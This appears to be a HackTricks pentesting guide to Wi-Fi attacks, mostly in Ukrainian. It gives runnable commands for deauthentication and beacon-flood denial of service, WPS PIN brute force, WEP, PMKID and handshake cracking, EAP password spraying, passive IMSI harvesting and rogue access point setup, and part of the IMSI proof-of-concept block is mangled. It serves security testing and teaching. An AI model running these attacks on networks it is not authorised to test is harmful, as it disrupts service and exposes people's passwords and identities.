Pentesting Wifi
Tip
Вивчайте та практикуйте AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Wifi базові команди
ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis
Інструменти
Hijacker & NexMon (вбудований Wi-Fi Android)
Enable Nexmon Monitor And Injection On Android
EAPHammer
git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup
Airgeddon
mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe
Запустити airgeddon за допомогою docker
docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon
From: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux
wifiphisher
Може виконувати атаки Evil Twin, KARMA та Known Beacons, а потім використовувати шаблон phishing для отримання справжнього password мережі або перехоплення social network credentials.
git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies
Wifite2
Цей інструмент автоматизує WPS/WEP/WPA-PSK атаки. Він автоматично:
- Переведе інтерфейс у monitor mode
- Сканує можливі мережі - і дозволить вам вибрати жертву(и)
- Якщо WEP - запустить WEP атаки
- Якщо WPA-PSK
- Якщо WPS: Pixie dust attack та bruteforce attack (уважно: brute-force attack може зайняти багато часу). Зауважте, що він не пробує null PIN або database/generated PINs.
- Спробує capture PMKID з AP, щоб crack it
- Спробує deauthenticate клієнтів AP, щоб capture handshake
- Якщо PMKID або Handshake, спробує bruteforce, використовуючи top5000 паролів.
Короткий огляд атак
- DoS
- Deauthentication/disassociation – Відключити всіх (або конкретний ESSID/Client)
- Random fake APs – Приховати мережі, можливий crash сканерів
- Overload AP – Спроба вивести AP з ладу (зазвичай не дуже корисно)
- WIDS – Працювати з IDS
- TKIP, EAPOL – Деякі специфічні атаки для DoS деяких AP
- Cracking
- Crack WEP (several tools and methods)
- WPA-PSK
- WPS pin “Brute-Force”
- WPA PMKID bruteforce
- [DoS +] WPA handshake capture + Cracking
- WPA-MGT
- Username capture
- Bruteforce Credentials
- Evil Twin (with or without DoS)
- Open Evil Twin [+ DoS] – Корисно для capture captive portal creds і/або виконання LAN attacks
- WPA-PSK Evil Twin – Корисно для мережевих атак, якщо ви знаєте пароль
- WPA-MGT – Корисно для capture company credentials
- KARMA, MANA, Loud MANA, Known beacon
- + Open – Корисно для capture captive portal creds і/або виконання LAN attacks
- + WPA – Корисно для capture WPA handshakes
Open / OWE networks quick notes
- Passive capture on open SSIDs still works with monitor mode and tcpdump:
iw wlan0 set type monitor
ip link set wlan0 up
iw wlan0 set channel 6
tcpdump -i wlan0 -w capture.pcap
- OWE (Opportunistic Wireless Encryption) виконує обмін ключами для кожної станції (no PSK), тож повітряні кадри шифруються навіть на “open” SSID. Оскільки базується на WPA3, воно також примушує виконання 802.11w PMF, що блокує підроблені deauth/disassoc frames.
- OWE не автентифікує підключення: будь-хто може асоціюватись, тому перевіряйте ізоляцію клієнтів замість довіри маркетинговим заявам. Без ізоляції ARP spoofing або responder-style poisoning на локальному L2 усе ще працює.
- Evil Twin залишається можливим на open/OWE SSID шляхом подання сильнішого сигналу; PMF лише прибирає деавт-«шорткат». Якщо жертви приймуть підроблений TLS cert, повний HTTP(S) MitM відновлюється.
- Broadcast poisoning на open guest Wi‑Fi легко дає creds/hashes (LLMNR/NBT-NS/mDNS). See:
Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
DOS
Deauthentication Packets
Опис з here:.
Deauthentication атаки, поширений метод у Wi‑Fi hacking, передбачають підробку “management” кадрів, щоб примусово відключити пристрої від мережі. Ці нешифровані пакети вводять клієнтів в оману, змушуючи вважати їх від легітимної мережі, що дозволяє нападникам збирати WPA handshakes для cracking або стійко порушувати мережеві з’єднання. Ця тактика, тривожно проста, широко використовується і має суттєві наслідки для безпеки мережі.
Deauthentication using Aireplay-ng
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0
- -0 означає deauthentication
- 1 — кількість deauths для відправлення (можна відправити кілька, якщо бажаєте); 0 означає відправляти їх безперервно
- -a 00:14:6C:7E:40:80 — MAC address точки доступу (AP)
- -c 00:0F:B5:34:30:30 — MAC address клієнта для deauthenticate; якщо це опущено — надсилається broadcast deauthentication (працює не завжди)
- ath0 — ім’я інтерфейсу
Disassociation Packets
Disassociation packets, схожі на deauthentication packets, є типом керуючого кадру, що використовується у Wi-Fi мережах. Ці пакети розривають з’єднання між пристроєм (наприклад, ноутбуком або смартфоном) та точкою доступу (AP). Головна відмінність між disassociation і deauthentication полягає в сценаріях їх використання. У той час як AP надсилає deauthentication packets to remove rogue devices explicitly from the network, disassociation packets are typically sent when the AP is undergoing a shutdown, перезавантаження або переміщення, що вимагає відключення всіх підключених вузлів.
Цю атаку можна виконати за допомогою mdk4(mode “d”):
# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F
Більше DOS-атак від mdk4
У here.
ATTACK MODE b: Beacon Flooding
Надсилає beacon frames, щоб показати фальшиві APs клієнтам. Іноді це може призвести до збою сканерів мережі і навіть драйверів!
# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m
ATTACK MODE a: Authentication Denial-Of-Service
Надсилання authentication frames до всіх доступних Access Points (APs) у зоні дії може перевантажити ці APs, особливо коли задіяно велику кількість клієнтів. Такий інтенсивний трафік може спричинити нестабільність системи, через що деякі APs зависають або навіть перезавантажуються.
# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m
ATTACK MODE p: SSID Probing and Bruteforcing
Probing Access Points (APs) перевіряє, чи SSID правильно відображається, і підтверджує радіус дії AP. Ця техніка, у поєднанні з bruteforcing hidden SSIDs з або без wordlist, допомагає ідентифікувати та отримати доступ до прихованих мереж.
ATTACK MODE m: Michael Countermeasures Exploitation
Відправлення випадкових або дубльованих пакетів у різні черги QoS може спровокувати Michael Countermeasures на TKIP APs, що призведе до одномінутного вимкнення AP. Цей метод є ефективною тактикою атаки DoS (Denial of Service).
# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]
РЕЖИМ АТАКИ e: EAPOL Start and Logoff Packet Injection
Затоплення AP EAPOL Start frames призводить до створення fake sessions, перевантажуючи AP та блокуючи легітимних клієнтів. Альтернативно, ін’єкція fake EAPOL Logoff messages примусово відключає клієнтів; обидва методи ефективно порушують роботу мережі.
# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]
ATTACK MODE s: Attacks for IEEE 802.11s mesh networks
Різні атаки на управління лінками та маршрутизацію в mesh-мережах.
ATTACK MODE w: WIDS Confusion
Паралельне підключення клієнтів до кількох WDS-вузлів або фальшивих rogue APs може маніпулювати Intrusion Detection and Prevention Systems, створюючи плутанину та потенційне зловживання системою.
# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]
ATTACK MODE f: Packet Fuzzer
Packet fuzzer, що включає різноманітні джерела пакетів і повний набір модифікаторів для маніпуляцій із пакетами.
Airggedon
Airgeddon пропонує більшість атак, запропонованих у попередніх коментарях:
.png)
WPS
WPS (Wi-Fi Protected Setup) спрощує процес підключення пристроїв до роутера, прискорюючи та полегшуючи налаштування для мереж, зашифрованих за допомогою WPA або WPA2 Personal. Він неефективний для легко зламуної WEP. WPS використовує 8-значний PIN, який перевіряється у двох частинах, що робить його вразливим до brute-force атак через обмежену кількість комбінацій (близько 11 000 можливостей).
WPS Bruteforce
Існують 2 основні інструменти для виконання цієї атаки: Reaver та Bully.
- Reaver був розроблений як надійний та практичний інструмент атаки на WPS і протестований на великій кількості точок доступу та реалізацій WPS.
- Bully — це нова реалізація WPS brute force атаки, написана на C. Має кілька переваг над оригінальним reaver code: менше залежностей, краща робота з пам’яттю та cpu, коректне оброблення порядку байтів (endianness) і більш надійний набір опцій.
Атака експлуатує WPS PIN’s vulnerability, зокрема те, що перші чотири цифри розкриваються, а остання цифра виконує роль контрольної суми, що полегшує brute-force атаку. Проте захисти від brute-force атак, такі як blocking MAC addresses агресивних зловмисників, вимагають MAC address rotation, щоб продовжити атаку.
Отримавши WPS PIN за допомогою інструментів, таких як Bully або Reaver, зловмисник може визначити WPA/WPA2 PSK, забезпечивши постійний доступ до мережі.
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3
Smart Brute Force
Цей вдосконалений підхід націлений на WPS PINs з використанням відомих вразливостей:
- Pre-discovered PINs: Використовуйте базу даних відомих PINs, пов’язану з конкретними виробниками, які відомі застосуванням уніфікованих WPS PINs. Ця база зіставляє перші три октети MAC-addresses з ймовірними PINs для цих виробників.
- PIN Generation Algorithms: Використовуйте алгоритми, такі як ComputePIN та EasyBox, які обчислюють WPS PINs на основі MAC-address AP. Алгоритм Arcadyan додатково вимагає device ID, додаючи шар до процесу генерації PIN.
WPS Pixie Dust attack
Dominique Bongard виявив вразливість в деяких Access Points (APs), що стосується створення секретних кодів, відомих як nonces (E-S1 та E-S2). Якщо ці nonces можна визначити, злам WPS PIN пристрою AP стає простим. AP розкриває PIN у спеціальному коді (hash), щоб довести свою легітимність і що він не є підробленим (rogue) AP. Ці nonces по суті є “ключами” для відкриття “сейфу”, що містить WPS PIN. Детальніше про це можна знайти тут.
Простими словами, суть проблеми в тому, що деякі APs не використовували достатньо випадкові ключі для шифрування PIN під час процесу підключення. Це робить PIN вразливим до відгадування з поза мережі (offline brute force attack).
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3
Якщо ви не хочете переключати пристрій у monitor mode, або reaver та bully мають проблеми, можете спробувати OneShot-C. Цей інструмент може виконувати Pixie Dust attack без переходу в monitor mode.
./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37
Null Pin attack
Деякі погано спроєктовані системи навіть дозволяють Null PIN (порожній або неіснуючий PIN) надати доступ, що досить незвично. Інструмент Reaver здатний перевіряти цю вразливість, на відміну від Bully.
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''
Airgeddon
Усі запропоновані WPS-атаки можна легко виконати за допомогою airgeddon.
.png)
- 5 та 6 дозволяють спробувати ваш власний PIN (якщо він у вас є)
- 7 та 8 виконують Pixie Dust attack
- 13 дозволяє протестувати NULL PIN
- 11 та 12 recollect the PINs related to the selected AP from available databases та згенерують можливі PINs за допомогою: ComputePIN, EasyBox і опційно Arcadyan (рекомендовано, чому б ні?)
- 9 та 10 протестують кожен можливий PIN
WEP
Чому він вразливий
- RC4 seed — це лише IV (24 bits) + shared key. IV знаходиться у відкритому тексті, дуже малий (2^24) і швидко повторюється, тому ciphertexts з тим самим IV повторно використовують keystream.
- XORing двох ciphertexts з тим самим keystream leaks
PlaintextA ⊕ PlaintextB; передбачувані заголовки + RC4 KSA biases (FMS) дозволяють «vote» байти ключа. PTW оптимізує це, використовуючи ARP traffic, щоб знизити вимоги до десятків тисяч пакетів замість мільйонів. - Integrity — лише CRC32 (linear/unkeyed), тому нападник може перевернути біти та перерахувати CRC32 без ключа → packet forgery/replay/ARP injection в очікуванні IV.
Практичний злам є детермінованим:
airodump-ng --bssid <BSSID> --channel <ch> --write wep_capture wlan1mon # collect IVs
# optionally speed up IVs without deauth by replaying ARP
aireplay-ng --arpreplay -b <BSSID> -h <clientMAC> wlan1mon
aircrack-ng wep_capture-01.cap # PTW attack recovers key once IV threshold is met
Airgeddon все ще постачається з “All-in-One” WEP workflow, якщо ви віддаєте перевагу guided UI.
.png)
WPA/WPA2 PSK
PMKID
У 2018 році hashcat revealed описав новий метод атаки, унікальний тим, що йому потрібен лише один пакет і він не вимагає підключених клієнтів до цільової AP — достатньо взаємодії між зловмисником і AP.
Багато сучасних маршрутизаторів додають необов’язкове поле до першого EAPOL фрейму під час асоціації, відоме як Robust Security Network. Воно включає PMKID.
Як пояснює оригінальний пост, PMKID створюється з використанням відомих даних:
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)
Оскільки “PMK Name” є константним, ми знаємо BSSID AP та station, а PMK ідентичний тому з повного 4-way handshake, hashcat може використати цю інформацію, щоб зламати PSK і відновити passphrase!
Щоб gather цю інформацію та локально bruteforce пароль, ви можете зробити:
airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1
#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1
PMKIDs captured будуть показані в console і також saved всередині _ /tmp/attack.pcap_
Тепер конвертуйте захоплення у формат hashcat/john і зламайте його:
hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Зверніть увагу, що формат правильного hash містить 4 частини, наприклад: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 Якщо ваш містить лише 3 частини, то він є недійсним (захоплення PMKID було недійсним).
Зауважте, що hcxdumptool також захоплює handshakes (з’явиться приблизно таке: MP:M1M2 RC:63258 EAPOLTIME:17091). Ви можете перетворити ці handshakes у формат hashcat/john за допомогою cap2hccapx
tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes
Я помітив, що деякі handshakes, захоплені цим інструментом, не могли бути cracked навіть при відомому правильному password. Рекомендую, якщо можливо, також захоплювати handshakes традиційним способом або захопити кілька handshakes за допомогою цього інструменту.
Handshake захоплення
Атака на WPA/WPA2 мережі може бути виконана шляхом захоплення handshake і спроби crack пароля offline. Цей процес передбачає моніторинг комунікації конкретної мережі і BSSID на певному channel. Ось стислий посібник:
- Визначте BSSID, channel, та connected client цільової мережі.
- Використайте
airodump-ngдля моніторингу трафіку мережі на вказаному channel і BSSID, у надії захопити handshake. Команда виглядатиме так:
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
- Щоб збільшити шанси на захоплення handshake, тимчасово відключіть клієнта від мережі, щоб змусити його повторно аутентифікуватися. Це можна зробити за допомогою команди
aireplay-ng, яка відправляє deauthentication packets клієнту:
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios
Зверніть увагу, що коли client був deauthenticated, він може спробувати підключитися до іншого AP або, в інших випадках, до іншої мережі.
Якщо в airodump-ng з’являється інформація про handshake, це означає, що handshake було захоплено і ви можете припинити прослуховування:
 (1).png)
Після того, як handshake захоплено, ви можете crack його за допомогою aircrack-ng:
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap
Перевірити, чи є handshake у файлі
aircrack
aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture
tshark
tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.
cowpatty -r psk-01.cap -s "ESSID" -f -
Якщо цей інструмент знайде незавершений handshake певного ESSID раніше за завершений, він не виявить дійсний.
pyrit
apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze
Швидше онлайн вгадування PSK через wpa_supplicant ctrl socket (no clients/PMKID)
Коли поблизу немає clients і AP відхиляє PMKID, ви можете перебирати PSKs онлайн без перезапуску supplicants:
- Внесіть патч у
wpa_supplicant.c, щоб примусово встановитиdur = 0;у логіці backoff при помилці автентифікації (біляssid->auth_failures), що фактично відключає таймер тимчасового відключення. - Запустіть один демон з control socket:
# wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=root
update_config=1
wpa_supplicant -B -i wlp3s0 -c wpa_supplicant.conf
- Керувати ним через інтерфейс управління, повторно використовуючи той самий скан і мережу:
ADD_NETWORK
SET_NETWORK 0 ssid "<ssid>"
ENABLE_NETWORK 0
SCAN
(loop)
SET_NETWORK 0 psk "<candidate>"
REASSOCIATE
wait for CTRL-EVENT-CONNECTED / DISCONNECTED
Невеликий цикл на Python, що читає події сокета (CTRL-EVENT-CONNECTED / CTRL-EVENT-DISCONNECTED), може перевірити ~100 припущень за ~5 хвилин без накладних витрат на сканування. Це все ще шумно й виявляється, але уникає перезапусків процесу для кожної спроби та backoff delays.
WPA Enterprise (MGT)
В корпоративних WiFi-налаштуваннях ви натрапите на різні методи аутентифікації, кожен із яких забезпечує різні рівні безпеки та можливості керування. Коли ви використовуєте інструменти на кшталт airodump-ng для аналізу мережевого трафіку, ви можете помітити ідентифікатори цих типів аутентифікації. До деяких поширених методів належать:
6A:FE:3B:73:18:FB -58 19 0 0 1 195 WPA2 CCMP MGT NameOfMyWifi
- EAP-GTC (Generic Token Card):
- Цей метод підтримує апаратні токени та одноразові паролі всередині EAP-PEAP. На відміну від MSCHAPv2, він не використовує peer challenge і надсилає паролі у відкритому вигляді на точку доступу, що створює ризик для downgrade атак.
- EAP-MD5 (Message Digest 5):
- Передбачає відправку MD5-хешу пароля від клієнта. Його не рекомендовано через вразливість до словникових атак, відсутність аутентифікації сервера та неможливість генерувати сесійні WEP keys.
- EAP-TLS (Transport Layer Security):
- Використовує сертифікати на боці клієнта та сервера для аутентифікації і може динамічно генерувати користувацькі та сесійні WEP keys для захисту зв’язку.
- EAP-TTLS (Tunneled Transport Layer Security):
- Забезпечує взаємну аутентифікацію через зашифрований тунель, а також метод для виведення динамічних, per-user, per-session WEP keys. Потребує лише серверних сертифікатів, клієнти використовують облікові дані.
- PEAP (Protected Extensible Authentication Protocol):
- Працює аналогічно EAP, створюючи TLS-тунель для захищеної передачі. Дозволяє використовувати слабші протоколи аутентифікації поверх EAP завдяки захисту тунелю.
- PEAP-MSCHAPv2: Часто називають просто PEAP, поєднує вразливий механізм challenge/response MSCHAPv2 із захисним TLS-тунелем.
- PEAP-EAP-TLS (or PEAP-TLS): Схожий на EAP-TLS, але ініціює TLS-тунель перед обміном сертифікатами, додаючи ще один рівень захисту.
You can find more information about these authentication methods here and here.
Username Capture
Читаючи https://tools.ietf.org/html/rfc3748#page-27, виглядає, що якщо ви використовуєте EAP, то “Identity” messages мають бути підтримані, і username буде надсилатися у відкритому вигляді в “Response Identity” повідомленнях.
Навіть використовуючи один із найбільш безпечних методів аутентифікації: PEAP-EAP-TLS, можливе capture the username sent in the EAP protocol. Для цього capture a authentication communication (запустіть airodump-ng на каналі і wireshark в тому ж інтерфейсі) і відфільтруйте пакети поeapol.
Всередині пакета “Response, Identity” з’явиться username клієнта.
.png)
Anonymous Identities
Приховування Identity підтримується як EAP-PEAP, так і EAP-TTLS. У контексті WiFi мережі, EAP-Identity запит зазвичай ініціюється точкою доступу (AP) під час процесу асоціації. Щоб забезпечити захист анонімності користувача, відповідь від EAP клієнта на пристрої користувача містить лише мінімальну інформацію, необхідну початковому RADIUS серверу для обробки запиту. Це поняття ілюструється наступними сценаріями:
- EAP-Identity = anonymous
- У цьому сценарії всі користувачі використовують псевдонім “anonymous” як свій ідентифікатор користувача. Початковий RADIUS сервер функціонує як EAP-PEAP або EAP-TTLS сервер, відповідаючи за серверну частину протоколу PEAP або TTLS. Внутрішній (захищений) метод аутентифікації тоді обробляється локально або делегується віддаленому (home) RADIUS серверу.
- EAP-Identity = anonymous@realm_x
- У цій ситуації користувачі з різних realm приховують свої ідентичності, вказуючи лише свої відповідні realm. Це дозволяє початковому RADIUS серверу проксувати EAP-PEAP або EAP-TTLS запити до RADIUS серверів у їхніх home realms, які виступають як PEAP або TTLS сервери. Початковий RADIUS сервер працює виключно як RADIUS relay node.
- Альтернативно, початковий RADIUS сервер може функціонувати як EAP-PEAP або EAP-TTLS сервер і або обробляти захищений метод аутентифікації, або пересилати його на інший сервер. Цей варіант дозволяє налаштовувати відмінні політики для різних realm.
В EAP-PEAP, як тільки TLS-тунель встановлено між PEAP сервером і PEAP клієнтом, PEAP сервер ініціює EAP-Identity запит і передає його через TLS-тунель. Клієнт відповідає на цей другий EAP-Identity запит, надсилаючи EAP-Identity response, що містить справжню ідентичність користувача через зашифрований тунель. Такий підхід ефективно запобігає розкриттю фактичної ідентичності користувача будь-кому, хто прослуховує 802.11 трафік.
EAP-TTLS слідує трохи іншій процедурі. У випадку EAP-TTLS клієнт зазвичай аутентифікується за допомогою PAP або CHAP, захищеними TLS-тунелем. У цьому випадку клієнт включає User-Name атрибут і або Password, або CHAP-Password атрибут у початковому TLS-повідомленні, відправленому після встановлення тунелю.
Незалежно від вибраного протоколу, PEAP/TTLS сервер дізнається справжню ідентичність користувача після встановлення TLS-тунелю. Справжня ідентичність може бути у форматі user@realm або просто user. Якщо PEAP/TTLS сервер також відповідає за аутентифікацію користувача, він тепер має ідентичність користувача і продовжує з методом аутентифікації, захищеним TLS-тунелем. Альтернативно, PEAP/TTLS сервер може переслати новий RADIUS запит на home RADIUS сервер користувача. Цей новий RADIUS запит не містить шару PEAP або TTLS. У випадках, коли захищений метод аутентифікації — EAP, внутрішні EAP повідомлення передаються до home RADIUS сервера без обгортки EAP-PEAP або EAP-TTLS. User-Name атрибут вихідного RADIUS повідомлення містить справжню ідентичність користувача, замінивши anonymous User-Name з вхідного RADIUS запиту. Коли захищений метод аутентифікації — PAP або CHAP (підтримується тільки TTLS), User-Name та інші атрибути аутентифікації, витягнуті з TLS payload, підставляються у вихідному RADIUS повідомленні, заміщаючи anonymous User-Name та TTLS EAP-Message атрибути з вхідного RADIUS запиту.
For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm
SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)
SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment doesn’t implement pseudonyms/protected identities or a TLS tunnel around the inner EAP.
Where the leak happens (high level):
- 802.11 association completes to the SSID (often carrier offload SSIDs like FreeWifi_secure, eduroam-like operator realms, etc.).
- Authenticator sends EAP-Request/Identity.
- Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI encoded as a 3GPP NAI, prior to any protection.
- Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
- Anyone passively listening to RF can read that frame. No 4-way handshake or TLS keying is needed.
Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy
Натисніть, щоб розгорнути
```bash # 1) Enable monitor mode airmon-ng start wlan02) Optional: lock channel to the target BSS
airodump-ng wlan0mon –essid
3) Capture 802.1X/EAP frames
Wireshark display filters:
eap || eapol
(identity specifically): eap.code == 2 && eap.type == 1
Kismet: add source wlan0mon; enable 802.1X/EAP views
tcpdump (pcap capture):
tcpdump -i wlan0mon -s 0 -w eapsim_identity.pcap
4) Wait for a device to auto-connect to the SSID
5) Inspect the first EAP-Response/Identity frame
Expected: ASCII NAI containing IMSI, e.g.
20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
</details>
Примітки:
- Працює до встановлення будь‑якого TLS‑тунелю, якщо розгортання використовує чистий EAP‑SIM/AKA без захищеної ідентичності/псевдонімів.
- Відкрите значення є постійним ідентифікатором, прив'язаним до SIM абонента; його збір дозволяє довготривале відстеження та подальші зловживання в телекомунікаціях.
Вплив
- Privacy: persistent user/device tracking from passive Wi‑Fi captures in public places.
- Telecom abuse bootstrap: with the IMSI, an attacker with SS7/Diameter access can query location or attempt call/SMS interception and MFA theft.
Заходи пом'якшення / на що звертати увагу
- Переконайтесь, що клієнти використовують анонімні зовнішні ідентичності (псевдоніми) для EAP‑SIM/AKA згідно з керівництвом 3GPP (наприклад, 3GPP TS 33.402).
- Віддавати перевагу тунелюванню фази ідентифікації (наприклад, EAP‑TTLS/PEAP з внутрішнім EAP‑SIM/AKA), щоб IMSI ніколи не передавався у відкритому вигляді.
- Пакетні захоплення при асоціації/аутентифікації не повинні розкривати сирий IMSI в EAP-Response/Identity.
Пов'язане: Telecom signalling exploitation with captured mobile identifiers
<a class="content_ref" href="../pentesting-network/telecom-network-exploitation.md"><span class="content_ref_label">Telecom Network Exploitation</span></a>
### EAP-Bruteforce (password spray)
Якщо очікується, що клієнт використовуватиме **username and password** (зверніть увагу, що **EAP-TLS won't be valid** у цьому випадку), то ви можете спробувати отримати **list** **usernames** (див. наступну частину) та **passwords** і спробувати **bruteforce** доступ за допомогою [**air-hammer**](https://github.com/Wh1t3Rh1n0/air-hammer)**.**
```bash
./air-hammer.py -i wlan0 -e Test-Network -P UserPassword1 -u usernames.txt
Ви також можете виконати цю атаку за допомогою eaphammer:
./eaphammer --eap-spray \
--interface-pool wlan0 wlan1 wlan2 wlan3 wlan4 \
--essid example-wifi \
--password bananas \
--user-list users.txt
Теорія атак на клієнта
Вибір мережі та роумінг
- Протокол 802.11 визначає, як станція приєднується до Extended Service Set (ESS), але не вказує критерії вибору ESS або access point (AP) у його межах.
- Станції можуть переміщуватися між AP, що використовують один і той же ESSID, підтримуючи зв’язок у будівлі або на певній території.
- Протокол вимагає автентифікації станції до ESS, але не зобов’язує AP проходити автентифікацію до станції.
Preferred Network Lists (PNLs)
- Станції зберігають ESSID кожної бездротової мережі, до якої вони підключалися, у Preferred Network List (PNL), разом із конфігурацією, специфічною для мережі.
- PNL використовується для автоматичного підключення до відомих мереж, покращуючи досвід користувача шляхом спрощення процесу підключення.
Passive Scanning
- AP періодично транслюють beacon frames, оголошуючи свою присутність і можливості, включно з ESSID AP, якщо трансляція не вимкнена.
- Під час passive scanning станції слухають beacon frames. Якщо ESSID у beacon збігається з записом у PNL станції, станція може автоматично підключитися до цього AP.
- Знання PNL пристрою дозволяє потенційно експлуатувати його, наслідуючи відому мережу за ESSID і введучи пристрій в оману для підключення до шкідливого AP.
Active Probing
- Active probing передбачає відправлення станціями probe requests для виявлення сусідніх AP і їх характеристик.
- Directed probe requests націлені на конкретний ESSID, допомагаючи визначити, чи певна мережа перебуває в зоні досяжності, навіть якщо вона прихована.
- Broadcast probe requests мають null SSID поле і відсилаються всім сусіднім AP, дозволяючи станції перевірити наявність будь-якої preferred мережі без розкриття вмісту її PNL.
Simple AP with redirection to Internet
Before explaining how to perform more complex attacks it’s going to be explained how to just create an AP and redirect it’s traffic to an interface connected to the Internet.
Using ifconfig -a check that the wlan interface to create the AP and the interface connected to the Internet are present.
DHCP & DNS
apt-get install dnsmasq #Manages DHCP and DNS
Створіть файл конфігурації /etc/dnsmasq.conf:
interface=wlan0
dhcp-authoritative
dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
dhcp-option=3,192.168.1.1
dhcp-option=6,192.168.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
Потім налаштуйте IP-адреси та маршрути:
ifconfig wlan0 up 192.168.1.1 netmask 255.255.255.0
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
А потім запустіть dnsmasq:
dnsmasq -C dnsmasq.conf -d
hostapd
apt-get install hostapd
Створіть конфігураційний файл hostapd.conf:
interface=wlan0
driver=nl80211
ssid=MITIWIFI
hw_mode=g
channel=11
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_passphrase=mitmwifi123
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
wpa_group_rekey=86400
ieee80211n=1
wme_enabled=1
Зупиніть зайві процеси, увімкніть monitor mode, та запустіть hostapd:
